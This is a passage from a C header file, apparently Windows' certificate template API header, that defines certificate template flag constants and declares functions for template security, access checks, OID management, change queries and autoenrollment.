#define CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL			0x04000000

// Subject alt name requires UPN
#define CT_FLAG_SUBJECT_ALT_REQUIRE_UPN				0x02000000

// Subject alt name requires directory GUID
#define CT_FLAG_SUBJECT_ALT_REQUIRE_DIRECTORY_GUID		0x01000000

// Subject alt name requires SPN
#define CT_FLAG_SUBJECT_ALT_REQUIRE_SPN                         0x00800000

// Subject alt name requires Domain DNS name
#define CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS                  0x00400000		

// Subject name should be copied from the renewing certificate
#define CT_FLAG_OLD_CERT_SUPPLIES_SUBJECT_AND_ALT_NAME          0x00000008	

//
// Obsolete name	
// The following flags are obsolete.  They are used by V1 templates in the
// general flags
//
#define CT_FLAG_IS_SUBJECT_REQ      CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT

// The e-mail name of the principal will be added to the cert
#define CT_FLAG_ADD_EMAIL					0x00000002

// Add the object GUID for this principal
#define CT_FLAG_ADD_OBJ_GUID					0x00000004

// Add DS Name (full DN) to szOID_SUBJECT_ALT_NAME2 (Subj Alt Name 2) extension
// This flag is not SET in any of the V1 templates and is of no interests to
// V2 templates since it is not present on the UI and will never be set.
#define CT_FLAG_ADD_DIRECTORY_PATH				0x00000100


//*****************************************************************************
//
// Private Key Flags:
//
//*****************************************************************************

// Archival of the private key is required
#define CTPRIVATEKEY_FLAG_REQUIRE_PRIVATE_KEY_ARCHIVAL		0x00000001

// Make the key for this cert exportable.
#define CTPRIVATEKEY_FLAG_EXPORTABLE_KEY		        0x00000010

// Require the strong key protection UI when a new key is generated
#define CTPRIVATEKEY_FLAG_STRONG_KEY_PROTECTION_REQUIRED	0x00000020

// Require discrete signature algorithm when request is signed
// Implies RSA V2.1 signature format for RSA signatures
#define CTPRIVATEKEY_FLAG_REQUIRE_ALTERNATE_SIGNATURE_ALGORITHM	0x00000040

// Renewal must re-use the same key (v4)
#define CTPRIVATEKEY_FLAG_REQUIRE_SAME_KEY_RENEWAL		0x00000080

// Use legacy CSP instead of CNG KSP (v4)
#define CTPRIVATEKEY_FLAG_USE_LEGACY_PROVIDER			0x00000100

// Attestation: allowed EK validation methods:
#define CTPRIVATEKEY_FLAG_EK_TRUST_ON_USE			0x00000200
#define CTPRIVATEKEY_FLAG_EK_VALIDATE_CERT			0x00000400
#define CTPRIVATEKEY_FLAG_EK_VALIDATE_KEY			0x00000800

// Attestation required/preferred/none:
#define CTPRIVATEKEY_FLAG_ATTEST_NONE				0x00000000
#define CTPRIVATEKEY_FLAG_ATTEST_PREFERRED			0x00001000
#define CTPRIVATEKEY_FLAG_ATTEST_REQUIRED			0x00002000
#define CTPRIVATEKEY_FLAG_ATTEST_MASK				0x00003000

#define CTPKSetAttestationLevel(f, v) \
    f = (((f) & ~CTPRIVATEKEY_FLAG_ATTEST_MASK) | (v) )

// Attestation without issuance policies
#define CTPRIVATEKEY_FLAG_ATTEST_WITHOUT_POLICY			0x00004000

// Minimum Template Server OS version:
#define CTPRIVATEKEY_FLAG_SERVERVERSION_MASK			0x000f0000
#define CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT			16

#define TEMPLATE_SERVER_VER_NONE	0
#define TEMPLATE_SERVER_VER_2003	1
#define TEMPLATE_SERVER_VER_2008	2
#define TEMPLATE_SERVER_VER_2008R2	3
#define TEMPLATE_SERVER_VER_WIN8	4
#define TEMPLATE_SERVER_VER_WINBLUE	5
#define TEMPLATE_SERVER_VER_THRESHOLD   6
#define TEMPLATE_SERVER_VER_CURRENT	TEMPLATE_SERVER_VER_THRESHOLD

// produces TEMPLATE_SERVER_VER_* values:
#define CTPKGetServerVersion(f)       (((f) & CTPRIVATEKEY_FLAG_SERVERVERSION_MASK) >> CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT)

#define CTPKSetServerVersion(f, v) \
    f = (((f) & ~CTPRIVATEKEY_FLAG_SERVERVERSION_MASK) | v << CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT)

// Convert CSVER_MAJOR_* to TEMPLATE_SERVER_VER_*
// CSVER_MAJOR increases in each release. TEMPLATE_SERVER_VER_* may or may not.
// Update the following macro if TEMPLATE_SERVER_VER_CURRENT stays the same
#define CS_MAJOR_VERSION_TO_TEMPLATE_SERVER_VERSION(v) (v - 1)

// Minimum Template Client OS version:
#define CTPRIVATEKEY_FLAG_CLIENTVERSION_MASK			0x0f000000
#define CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT			24

#define TEMPLATE_CLIENT_VER_NONE	0
#define TEMPLATE_CLIENT_VER_XP		1
#define TEMPLATE_CLIENT_VER_VISTA	2
#define TEMPLATE_CLIENT_VER_WIN7	3
#define TEMPLATE_CLIENT_VER_WIN8	4
#define TEMPLATE_CLIENT_VER_WINBLUE	5
#define TEMPLATE_CLIENT_VER_THRESHOLD   6
#define TEMPLATE_CLIENT_VER_CURRENT	TEMPLATE_CLIENT_VER_THRESHOLD

// produces TEMPLATE_CLIENT_VER_* values:
#define CTPKGetClientVersion(f)       (((f) & CTPRIVATEKEY_FLAG_CLIENTVERSION_MASK) >> CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT)

#define CTPKSetClientVersion(f, v) \
    f = (((f) & ~CTPRIVATEKEY_FLAG_CLIENTVERSION_MASK) | v << CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT)

#define CTPKIsCNGTemplate(s, f) \
    (CERTTYPE_SCHEMA_VERSION_3 == (s) ||	\
     (CERTTYPE_SCHEMA_VERSION_4 <= (s) &&	\
      0 == (CTPRIVATEKEY_FLAG_USE_LEGACY_PROVIDER & (f))))


//--------------------------------------------------------------
// For backwards compatibility only:
#define CT_FLAG_ALLOW_PRIVATE_KEY_ARCHIVAL	CTPRIVATEKEY_FLAG_REQUIRE_PRIVATE_KEY_ARCHIVAL
#define CT_FLAG_REQUIRE_PRIVATE_KEY_ARCHIVAL	CTPRIVATEKEY_FLAG_REQUIRE_PRIVATE_KEY_ARCHIVAL
#define CT_FLAG_EXPORTABLE_KEY			CTPRIVATEKEY_FLAG_EXPORTABLE_KEY
#define CT_FLAG_STRONG_KEY_PROTECTION_REQUIRED	CTPRIVATEKEY_FLAG_STRONG_KEY_PROTECTION_REQUIRED
#define CT_FLAG_REQUIRE_ALTERNATE_SIGNATURE_ALGORITHM CTPRIVATEKEY_FLAG_REQUIRE_ALTERNATE_SIGNATURE_ALGORITHM


//*****************************************************************************
//
// General Flags
//
//	More flags should start from 0x00002000
//
//*****************************************************************************
// This is a machine cert type
#define CT_FLAG_MACHINE_TYPE                0x00000040

// This is a CA	cert type
#define CT_FLAG_IS_CA                       0x00000080

// This is a cross CA cert type 
#define CT_FLAG_IS_CROSS_CA                 0x00000800

// Tells the CA that this certificate should not be persisted in
// the database if the CA is configured to do so.
#define CT_FLAG_DONOTPERSISTINDB	0x00001000





// The type is a default cert type (cannot be set).  This flag will be set on
// all V1 templates.  The templates can not be edited or deleted.
#define CT_FLAG_IS_DEFAULT                  0x00010000

// The type has been modified, if it is default (cannot be set)
#define CT_FLAG_IS_MODIFIED                 0x00020000

// settable flags for general flags
#define CT_MASK_SETTABLE_FLAGS              0x0000ffff


// certenroll_end

//
// CASetCertTypeFlags
// Sets the General Flags of a cert type.
// This function is obsolete.  Use CASetCertTypeFlagsEx.
//
// hCertType            - handle to the CertType
//
// dwFlags              - Flags to be set
//

HRESULT
WINAPI
CASetCertTypeFlags(
    IN HCERTTYPE           hCertType,
    IN DWORD               dwFlags
    );

//
// CASetCertTypeFlagsEx
// Sets the Flags of a cert type
//
// hCertType            - handle to the CertType
//
// dwOption             - Which flag to set
//                        Can be one of the following:
//                        CERTTYPE_ENROLLMENT_FLAG
//                        CERTTYPE_SUBJECT_NAME_FLAG
//                        CERTTYPE_PRIVATE_KEY_FLAG
//                        CERTTYPE_GENERAL_FLAG
//
// dwFlags              - Value to be set
//          

HRESULT
WINAPI
CASetCertTypeFlagsEx(
    IN HCERTTYPE           hCertType,
    IN DWORD               dwOption,
    IN DWORD               dwFlags
    );

//
// CAGetCertTypeKeySpec
// Retrieve the CAPI Key Spec for this cert type
//
// hCertType            - handle to the CertType
//
// pdwKeySpec           - pointer to DWORD receiving key spec
//

HRESULT
WINAPI
CAGetCertTypeKeySpec(
    IN  HCERTTYPE           hCertType,
    OUT DWORD *             pdwKeySpec
    );

//
// CACertTypeSetKeySpec
// Sets the CAPI1 Key Spec of a cert type
//
// hCertType            - handle to the CertType
//
// dwKeySpec            - KeySpec to be set
//

HRESULT
WINAPI
CASetCertTypeKeySpec(
    IN HCERTTYPE            hCertType,
    IN DWORD                dwKeySpec
    );

//
// CAGetCertTypeExpiration
// Retrieve the Expiration Info for this cert type
//
// pftExpiration        - pointer to the FILETIME structure receiving
//                        the expiration period for this cert type.
//
// pftOverlap           - pointer to the FILETIME structure receiving the
//			  suggested renewal overlap period for this cert type.
//

HRESULT
WINAPI
CAGetCertTypeExpiration(
    IN  HCERTTYPE           hCertType,
    OUT OPTIONAL FILETIME * pftExpiration,
    OUT OPTIONAL FILETIME * pftOverlap
    );

//
// CASetCertTypeExpiration
// Set the Expiration Info for this cert type
//
// pftExpiration        - pointer to the FILETIME structure containing
//                        the expiration period for this cert type.
//
// pftOverlap           - pointer to the FILETIME structure containing the
//			  suggested renewal overlap period for this cert type.
//

HRESULT
WINAPI
CASetCertTypeExpiration(
    IN  HCERTTYPE           hCertType,
    IN OPTIONAL FILETIME  * pftExpiration,
    IN OPTIONAL FILETIME  * pftOverlap
    );
//
// CACertTypeSetSecurity
// Set the list of Users, Groups, and Machines allowed
// to access this cert type.
//
// hCertType            - handle to the CertType
//
// pSD                  - Security descriptor for this cert type
//

HRESULT
WINAPI
CACertTypeSetSecurity(
    IN HCERTTYPE               hCertType,
    IN PSECURITY_DESCRIPTOR    pSD
    );


//
// CACertTypeGetSecurity
// Get the list of Users, Groups, and Machines allowed
// to access this cert type.
//
// hCertType            - handle to the CertType
//
// ppaSidList           - Pointer to a location receiving the pointer to the
//			  security descriptor.  Free via LocalFree.
//

HRESULT
WINAPI
CACertTypeGetSecurity(
    IN  HCERTTYPE                  hCertType,
    OUT PSECURITY_DESCRIPTOR *     ppSD
    );

//
//
// CACertTypeAccessCheck
// Determine whether the principal specified by
// ClientToken can be issued this cert type.
//
// hCertType            - handle to the CertType
//
// ClientToken          - Handle to an impersonation token that represents the
//			  client attempting to request this cert type.  The
//			  handle must have TOKEN_QUERY access to the token;
//                        otherwise, the call fails with ERROR_ACCESS_DENIED.
//
// Return: S_OK on success
//

HRESULT
WINAPI
CACertTypeAccessCheck(
    IN HCERTTYPE    hCertType,
    IN HANDLE       ClientToken
    );

//
//
// CACertTypeAccessCheckEx
// Determine whether the principal specified by
// ClientToken can be issued this cert type.
//
// hCertType            - handle to the CertType
//
// ClientToken          - Handle to an impersonation token that represents the
//			  client attempting to request this cert type.  The
//			  handle must have TOKEN_QUERY access to the token;
//                        otherwise, the call fails with ERROR_ACCESS_DENIED.
//
// dwOption             - Can be one of the following:
//                        CERTTYPE_ACCESS_CHECK_ENROLL
//                        CERTTYPE_ACCESS_CHECK_AUTO_ENROLL
//                        CERTTYPE_ACCESS_CHECK_WRITE_DAC
//                        CERTTYPE_ACCESS_CHECK_CHANGE_OWNER
//                      
//                      dwOption can be ORed with CERTTYPE_ACCESS_CHECK_NO_MAPPING
//                      to disallow default mapping of client token
//
// Return: S_OK on success
//

HRESULT
WINAPI
CACertTypeAccessCheckEx(
    IN HCERTTYPE    hCertType,
    IN HANDLE       ClientToken,
    IN DWORD        dwOption
    );


//
//
// CACertTypeAuthzAccessCheck
// Determine whether the principal specified by
// AuthzClientToken can be issued this cert type.
//
// hCertType            - handle to the CertType
//
// AuthzClientToken          - Handle to an Authztoken that represents the
//			  client attempting to request this cert type.  
//
// dwOption             - Can be one of the following:
//                        CERTTYPE_ACCESS_CHECK_ENROLL
//                        CERTTYPE_ACCESS_CHECK_AUTO_ENROLL
//                      
//
// Return: S_OK on success
//

HRESULT
WINAPI
CACertTypeAuthzAccessCheck(
    IN HCERTTYPE    hCertType,
    IN  PVOID         AuthzClientToken,
    IN DWORD        dwOption
    );



#define CERTTYPE_ACCESS_CHECK_ENROLL        0x01
#define CERTTYPE_ACCESS_CHECK_AUTO_ENROLL   0x02
#define CERTTYPE_ACCESS_CHECK_READ          0x04
#define CERTTYPE_ACCESS_CHECK_WRITE_DAC  0x08
#define CERTTYPE_ACCESS_CHECK_CHANGE_OWNER 0x10

#define CERTTYPE_ACCESS_CHECK_NO_MAPPING    0x00010000


//
// CAGetCertTypeAccessRights
//
// Determine the access rights of the HCertType based on the current context
//
// hCertType        - Handle to the CertType
//
// dwContext    - Can be one of the following:
//                 CA_CONTEXT_CURREN 
//                 CA_CONTEXT_ADMINISTRATOR_FORCE_MACHINE
//
// pdwAccessRight- Oring of the following flags:
//                 CA_ACCESS_RIGHT_READ
//                 CA_ACCESS_RIGH_ENROLL
//                 CA_ACCESS_RIGHT_AUTO_ENROLL
//
//
// Return: S_OK on success
//
HRESULT
WINAPI
CAGetCertTypeAccessRights(
    IN  HCERTTYPE    hCertType,
    IN  DWORD        dwContext,
    OUT DWORD        *pdwAccessRights 
    );


// CAIsCertTypeValid
//
// Determine if the HCERTTYPE has full properties and readable
// from the current context.  For CertTypes that are not readable from
// current context, only CERTTYPE_PROP_CN are present
//
// hCertType        - Handle to the CertType
//
// pValid           - TRUE is the CertType is readable
//
// Return: S_OK on success
//
HRESULT
WINAPI
CAIsCertTypeValid(
    IN  HCERTTYPE    hCertType,
    OUT BOOL        *pValid
    );


//
//
// CAInstallDefaultCertType
//
// Install default certificate types on the enterprise.  
//
// dwFlags            - Reserved.  Must be 0 for now
//
//
// Return: S_OK on success
//
HRESULT
WINAPI
CAInstallDefaultCertType(
    IN DWORD dwFlags
    );

//
//
// CAInstallDefaultCertTypeEx
//
// Install default certificate types on the enterprise.  
//
// lpPara:-              is a pointer to an LDAP handle
//                           if dwFlags has CT_FLAG_SCOPE_IS_LDAP_HANDLE
//                           and is NULL otherwise
// dwFlags:-                 CT_FLAG_SCOPE_IS_LDAP_HANDLE ,
//                                 0
//
//
// Return: S_OK on success
//
HRESULT
WINAPI
CAInstallDefaultCertTypeEx(
    IN LPVOID lpPara,
    IN DWORD dwFlags
    );


//
//
// CAIsCertTypeCurrent
//
// Check if the certificate type on the DS is up to date 
//
// dwFlags            - Reserved.  Must be 0 for now
// wszCertType        - The name for the certificate type
//
// Return: TRUE if the cert type is update to date
//
BOOL
WINAPI
CAIsCertTypeCurrent(
    IN DWORD    dwFlags,
    _In_ LPWSTR   wszCertType   
    );


//
//
// CAIsCertTypeCurrentEx
//
// Check if the certificate type on the DS is up to date 
//
// lpPara:-              is a pointer to an LDAP handle
//                           if dwFlags has CT_FLAG_SCOPE_IS_LDAP_HANDLE
//                           and is NULL otherwise
// dwFlags:-                 CT_FLAG_SCOPE_IS_LDAP_HANDLE ,
//                                 0
// wszCertType        - The name for the certificate type
//
// Return: TRUE if the cert type is update to date
//
BOOL
WINAPI
CAIsCertTypeCurrentEx(
    IN LPVOID lpPara,
    IN DWORD    dwFlags,
    _In_ LPWSTR   wszCertType   
    );






//*****************************************************************************
//
//  OID management APIs
//
//*****************************************************************************
//
// CAOIDCreateNew
// Create a new OID based on the enterprise base
//
// dwType                - Can be one of the following:
//                        CERT_OID_TYPE_TEMPLATE			
//                        CERT_OID_TYPE_ISSUER_POLICY
//                        CERT_OID_TYPE_APPLICATION_POLICY
//
// dwFlag               - Reserved.  Must be 0.
//
// ppwszOID             - Return the new OID.  Free memory via LocalFree().
//
// Returns S_OK if successful.
//

HRESULT
WINAPI
CAOIDCreateNew(
    IN	DWORD   dwType,
    IN  DWORD   dwFlag,
    _Outptr_ LPWSTR	*ppwszOID);


// CAOIDCreateNewEx
// Create a new OID based on the enterprise base
//
// dwType                - Can be one of the following:
//                        CERT_OID_TYPE_TEMPLATE			
//                        CERT_OID_TYPE_ISSUER_POLICY
//                        CERT_OID_TYPE_APPLICATION_POLICY
//
// dwFlag               - CA_FLAG_SCOPE_IS_LDAP_HANDLE or 0.
// lpPara			    - if dwFlag is CT_FLAG_SCOPE_IS_LDAP_HANDLE
//                        then this is the LDAP handle otherwise this is NULL                              
//
// ppwszOID             - Return the new OID.  Free memory via LocalFree().
//
// Returns S_OK if successful.
//

HRESULT
WINAPI
CAOIDCreateNewEx(
    IN	DWORD   dwType,
    IN  DWORD   dwFlag,
    _In_opt_  LPVOID lpPara,    
    _Outptr_ LPWSTR	*ppwszOID);




#define CERT_OID_TYPE_TEMPLATE			0x01
#define CERT_OID_TYPE_ISSUER_POLICY		0x02
#define CERT_OID_TYPE_APPLICATION_POLICY	0x03

//
// CAOIDAdd
// Add an OID to the DS repository
//
// dwType               - Can be one of the following:
//                        CERT_OID_TYPE_TEMPLATE			
//                        CERT_OID_TYPE_ISSUER_POLICY
//                        CERT_OID_TYPE_APPLICATION_POLICY
//
// dwFlag               - Reserved.  Must be 0.
//
// pwszOID              - The OID to add.
//
// Returns S_OK if successful.
// Returns CRYPT_E_EXISTS if the OID alreay exits in the DS repository
//

HRESULT
WINAPI
CAOIDAdd(
    IN	DWORD       dwType,
    IN  DWORD       dwFlag,
    IN  LPCWSTR	    pwszOID);


//
// CAOIDAddEx
// Add an OID to the DS repository
//
// dwType               - Can be one of the following:
//                        CERT_OID_TYPE_TEMPLATE			
//                        CERT_OID_TYPE_ISSUER_POLICY
//                        CERT_OID_TYPE_APPLICATION_POLICY
//
// dwFlag               - CA_FLAG_SCOPE_IS_LDAP_HANDLE or 0.
// lpPara			    - if dwFlag is CT_FLAG_SCOPE_IS_LDAP_HANDLE
//                        then this is the LDAP handle otherwise this is NULL     
//
// pwszOID              - The OID to add.
//
// Returns S_OK if successful.
// Returns CRYPT_E_EXISTS if the OID alreay exits in the DS repository
//

HRESULT
WINAPI
CAOIDAddEx(
    IN	DWORD       dwType,
    IN  DWORD       dwFlag,
    _In_opt_  LPVOID      lpPara,
    IN  LPCWSTR	    pwszOID);




//
// CAOIDDelete
// Delete the OID from the DS repository
//
// pwszOID              - The OID to delete.
//
// Returns S_OK if successful.
//

HRESULT
WINAPI
CAOIDDelete(
    IN LPCWSTR	pwszOID);

//
// CAOIDDeleteEx
// Delete the OID from the DS repository
//
// dwFlag               - CA_FLAG_SCOPE_IS_LDAP_HANDLE or 0.
// lpPara			    - if dwFlag is CT_FLAG_SCOPE_IS_LDAP_HANDLE
//                        then this is the LDAP handle otherwise this is NULL       
// pwszOID              - The OID to delete.
//
// Returns S_OK if successful.
//

HRESULT
WINAPI
CAOIDDeleteEx(
    IN  DWORD   dwFlag,
    _In_opt_  LPVOID lpPara, 
    IN LPCWSTR	pwszOID);

//
// CAOIDSetProperty
// Set a property on an OID.  
//
// pwszOID              - The OID whose value is set
// dwProperty           - The property name.  Can be one of the following:
//                        CERT_OID_PROPERTY_DISPLAY_NAME
//                        CERT_OID_PROPERTY_CPS
//
// pPropValue           - The value of the property.
//                        If dwProperty is CERT_OID_PROPERTY_DISPLAY_NAME,
//                        pPropValue is LPWSTR. 
//                        if dwProperty is CERT_OID_PROPERTY_CPS,
//                        pPropValue is LPWSTR.  
//                        NULL will remove the property
//
//
// Returns S_OK if successful.
//

HRESULT
WINAPI
CAOIDSetProperty(
    IN  LPCWSTR pwszOID,
    IN  DWORD   dwProperty,
    IN  LPVOID  pPropValue);


//
// CAOIDSetPropertyEx
// Set a property on an OID.  
//
// dwFlag               - CA_FLAG_SCOPE_IS_LDAP_HANDLE or 0.
// lpPara			    - if dwFlag is CT_FLAG_SCOPE_IS_LDAP_HANDLE
//                        then this is the LDAP handle otherwise this is NULL  
//
// pwszOID              - The OID whose value is set
// dwProperty           - The property name.  Can be one of the following:
//                        CERT_OID_PROPERTY_DISPLAY_NAME
//                        CERT_OID_PROPERTY_CPS
//
// pPropValue           - The value of the property.
//                        If dwProperty is CERT_OID_PROPERTY_DISPLAY_NAME,
//                        pPropValue is LPWSTR. 
//                        if dwProperty is CERT_OID_PROPERTY_CPS,
//                        pPropValue is LPWSTR.  
//                        NULL will remove the property
//
//
// Returns S_OK if successful.
//

HRESULT
WINAPI
CAOIDSetPropertyEx(
    IN  DWORD   dwFlag,
    _In_opt_  LPVOID lpPara, 
    IN  LPCWSTR pwszOID,
    IN  DWORD   dwProperty,
    IN  LPVOID  pPropValue);




#define CERT_OID_PROPERTY_DISPLAY_NAME      0x01
#define CERT_OID_PROPERTY_CPS               0x02
#define CERT_OID_PROPERTY_TYPE              0x03

//
// CAOIDGetProperty
// Get a property on an OID.  
//
// pwszOID              - The OID whose value is queried
// dwProperty           - The property name.  Can be one of the following:
//                        CERT_OID_PROPERTY_DISPLAY_NAME
//                        CERT_OID_PROPERTY_CPS
//                        CERT_OID_PROPERTY_TYPE
//
// pPropValue           - The value of the property.
//                        If dwProperty is CERT_OID_PROPERTY_DISPLAY_NAME,
//                        pPropValue is LPWSTR *.  
//                        if dwProperty is CERT_OID_PROPERTY_CPS, pPropValue is
//			  LPWSTR *. 
//
//                        Free the above properties via CAOIDFreeProperty().
//
//                        If dwProperty is CERT_OID_PROPERTY_TYPE, pPropValue
//			  is DWORD *. 
//
// Returns S_OK if successful.
//
HRESULT
WINAPI
CAOIDGetProperty(
    IN  LPCWSTR pwszOID,
    IN  DWORD   dwProperty,
    OUT LPVOID  pPropValue);


//
// CAOIDGetPropertyEx
// Get a property on an OID.  
//
// dwFlag               - CA_FLAG_SCOPE_IS_LDAP_HANDLE or 0.
// lpPara			    - if dwFlag is CT_FLAG_SCOPE_IS_LDAP_HANDLE
//                        then this is the LDAP handle otherwise this is NULL  
//
// pwszOID              - The OID whose value is queried
// dwProperty           - The property name.  Can be one of the following:
//                        CERT_OID_PROPERTY_DISPLAY_NAME
//                        CERT_OID_PROPERTY_CPS
//                        CERT_OID_PROPERTY_TYPE
//
// pPropValue           - The value of the property.
//                        If dwProperty is CERT_OID_PROPERTY_DISPLAY_NAME,
//                        pPropValue is LPWSTR *.  
//                        if dwProperty is CERT_OID_PROPERTY_CPS, pPropValue is
//			  LPWSTR *. 
//
//                        Free the above properties via CAOIDFreeProperty().
//
//                        If dwProperty is CERT_OID_PROPERTY_TYPE, pPropValue
//			  is DWORD *. 
//
// Returns S_OK if successful.
//
HRESULT
WINAPI
CAOIDGetPropertyEx(
    IN  DWORD   dwFlag,
    _In_opt_  LPVOID lpPara, 
    IN  LPCWSTR pwszOID,
    IN  DWORD   dwProperty,
    OUT LPVOID  pPropValue);




//
// CAOIDFreeProperty
// Free a property returned from CAOIDGetProperty  
//
// pPropValue           - The value of the property.
//
// Returns S_OK if successful.
//

HRESULT
WINAPI
CAOIDFreeProperty(
    IN LPVOID  pPropValue);

//
// CAOIDGetLdapURL
// 
// Return the LDAP URL for OID repository.  In the format of 
// LDAP:///DN of the Repository/all attributes?one?filter.  The filter
// is determined by dwType.
//
// dwType               - Can be one of the following:
//                        CERT_OID_TYPE_TEMPLATE			
//                        CERT_OID_TYPE_ISSUER_POLICY
//                        CERT_OID_TYPE_APPLICATION_POLICY
//                        CERT_OID_TYPE_ALL
//
// dwFlag               - Reserved.  Must be 0.
//
// ppwszURL             - Return the URL.  Free memory via CAOIDFreeLdapURL.
//
// Returns S_OK if successful.
//
HRESULT
WINAPI
CAOIDGetLdapURL(
    IN  DWORD   dwType,
    IN  DWORD   dwFlag,
    _Outptr_ LPWSTR  *ppwszURL);

#define CERT_OID_TYPE_ALL           0x0

//
// CAOIDFreeLDAPURL
// Free the URL returned from CAOIDGetLdapURL
//
// pwszURL      - The URL returned from CAOIDGetLdapURL
//
// Returns S_OK if successful.
//
HRESULT
WINAPI
CAOIDFreeLdapURL(
    IN LPCWSTR      pwszURL);


//the LDAP properties for OID class
#define OID_PROP_TYPE                   L"flags"
#define OID_PROP_TYPE_A                 "flags"

#define OID_PROP_OID                    L"msPKI-Cert-Template-OID"
#define OID_PROP_OID_A                  "msPKI-Cert-Template-OID"

#define OID_PROP_DISPLAY_NAME           L"displayName"
#define OID_PROP_DISPLAY_NAME_A         "displayName"

#define OID_PROP_CPS                    L"msPKI-OID-CPS"
#define OID_PROP_CPS_A                  "msPKI-OID-CPS"

#define OID_PROP_LOCALIZED_NAME         L"msPKI-OIDLocalizedName"
#define OID_PROP_LOCALIZED_NAME_A       "msPKI-OIDLocalizedName"

#define CT_QUERY_REGISTER_CERTTYPE_CHANGE_FLAG 0x00000001
#define CT_QUERY_REGISTER_CA_CHANGE_FLAG 0x00000002

//*****************************************************************************
//
//  Cert Type Change Query APIS
//
//*****************************************************************************
//
// CACertTypeRegisterQuery
// 
//      Regiser the calling thread to query if any modification has happened
//  to cert type information on the directory
//
//
// dwFlag               - CT_QUERY_REGISTER_CERTTYPE_CHANGE_FLAG or
//                        CT_QUERY_REGISTER_CA_CHANGE_FLAG                        
//
// pvldap               - The LDAP handle to the directory (LDAP *).  Optional input.
//                        If pvldap is not NULL, then the caller has to call
//                        CACertTypeUnregisterQuery before unbind the pldap.
//
// pHCertTypeQuery      - Receive the HCERTTYPEQUERY handle upon success.
//
// Returns S_OK if successful.
//
//
HRESULT
WINAPI
CACertTypeRegisterQuery(
    IN	DWORD               dwFlag,
    IN  LPVOID              pvldap,
    OUT HCERTTYPEQUERY      *phCertTypeQuery);



//
// CACertTypeQuery
// 
//      Returns a change sequence number which is incremented by 1 whenever
// cert type information on the directory is changed.     
//
// hCertTypeQuery               -  The hCertTypeQuery returned from previous
//                                  CACertTypeRegisterQuery  calls.
//
// *pdwChangeSequence           -  Returns a DWORD, which is incremented by 1 
//                                  whenever any changes has happened to cert type 
//                                  information on the directory since the last 
//                                  call to CACertTypeRegisterQuery or CACertTypeQuery.
//
//
//
// Returns S_OK if successful.
//
//
HRESULT
WINAPI
CACertTypeQuery(
    IN	HCERTTYPEQUERY  hCertTypeQuery,
    OUT DWORD           *pdwChangeSequence);



//
// CACertTypeUnregisterQuery
// 
//      Unregister the calling thread to query if any modification has happened
//  to cert type information on the directory
//
//
// hCertTypeQuery               -  The hCertTypeQuery returned from previous
//                                  CACertTypeRegisterQuery calls.
//
// Returns S_OK if successful.
//
//
HRESULT
WINAPI
CACertTypeUnregisterQuery(
    IN	HCERTTYPEQUERY  hCertTypeQuery);


//*****************************************************************************
//
//  Autoenrollment APIs
//
//*****************************************************************************

//
// CACreateLocalAutoEnrollmentObject
// Create an auto-enrollment object on the local machine.
//
// pwszCertType - The name of the certificate type for which to create the
//		  auto-enrollment object
//
// awszCAs      - The list of CAs to add to the auto-enrollment object with the
//		  last entry in the list being NULL.  If the list is NULL or
//		  empty, then it create an auto-enrollment object which
//		  instructs the system to enroll for a cert at any CA
//		  supporting the requested certificate type.
//
// pSignerInfo  - not used, must be NULL.
//
// dwFlags      - can be CERT_SYSTEM_STORE_CURRENT_USER or
//		  CERT_SYSTEM_STORE_LOCAL_MACHINE, indicating auto-enrollment
//		  store in which the auto-enrollment object is created.
//
// Return:      S_OK on success.
//

HRESULT
WINAPI
CACreateLocalAutoEnrollmentObject(
    IN LPCWSTR                              pwszCertType,
    _In_opt_z_ PWSTR *                      awszCAs,
    IN OPTIONAL PCMSG_SIGNED_ENCODE_INFO    pSignerInfo,
    IN DWORD                                dwFlags);

//
// CADeleteLocalAutoEnrollmentObject
// Delete an auto-enrollment object on the local machine.
//
// pwszCertType - The name of the certificate type for which to delete the
//		  auto-enrollment object
//
// awszCAs      - not used. must be NULL.  All callers to CACreateLocalAutoEnrollmentObject
//                have supplied NULL.
//
// pSignerInfo  - not used, must be NULL.
//
// dwFlags      - can be CERT_SYSTEM_STORE_CURRENT_USER or
//		  CERT_SYSTEM_STORE_LOCAL_MACHINE, indicating auto-enrollment
//		  store in which the auto-enrollment object is deleted.
//
// Return:      S_OK on success.
//

HRESULT
WINAPI
CADeleteLocalAutoEnrollmentObject(
    IN LPCWSTR                              pwszCertType,
    _In_opt_z_ PWSTR *                      awszCAs,
    IN OPTIONAL PCMSG_SIGNED_ENCODE_INFO    pSignerInfo,
    IN DWORD                                dwFlags);


//
// CACreateAutoEnrollmentObjectEx
// Create an auto-enrollment object in the indicated store.
//
// pwszCertType - The name of the certificate type for which to create the
//		  auto-enrollment object
//
// pwszObjectID - An identifying string for this autoenrollment object.  NULL
//		  may be passed if this object is simply to be identified by
//		  its certificate template.  An autoenrollment object is
//		  identified by a combination of its object id and its cert
//		  type name.
//
// awszCAs      - The list of CAs to add to the auto-enrollment object, with
//		  the last entry in the list being NULL.  If the list is NULL
//		  or empty, then it create an auto-enrollment object which
//		  instructs the system to enroll for a cert at any CA
//		  supporting the requested certificate type.
//
// pSignerInfo  - not used, must be NULL.
//
// StoreProvider - see CertOpenStore
//
// dwFlags      - see CertOpenStore
//
// pvPara       - see CertOpenStore
//
// Return:      S_OK on success.
//
//

HRESULT
WINAPI
CACreateAutoEnrollmentObjectEx(
    IN LPCWSTR                     pwszCertType,
    IN LPCWSTR                     wszObjectID,
    _In_z_ PWSTR *                 awszCAs,
    IN PCMSG_SIGNED_ENCODE_INFO    pSignerInfo,
    IN LPCSTR                      StoreProvider,
    IN DWORD                       dwFlags,
    IN const void *                pvPara);



typedef struct _CERTSERVERENROLL
{
    DWORD   Disposition;
    HRESULT hrLastStatus;
    DWORD   RequestId;
    BYTE   *pbCert;
    DWORD   cbCert;
    BYTE   *pbCertChain;
    DWORD   cbCertChain;
    WCHAR  *pwszDispositionMessage;
} CERTSERVERENROLL;


//*****************************************************************************
//
// Cert Server RPC interfaces:
//
//*****************************************************************************

HRESULT
WINAPI
CertServerSubmitRequest(
    _In_ DWORD Flags,
    _In_ BYTE const *pbRequest,
    _In_ DWORD cbRequest,
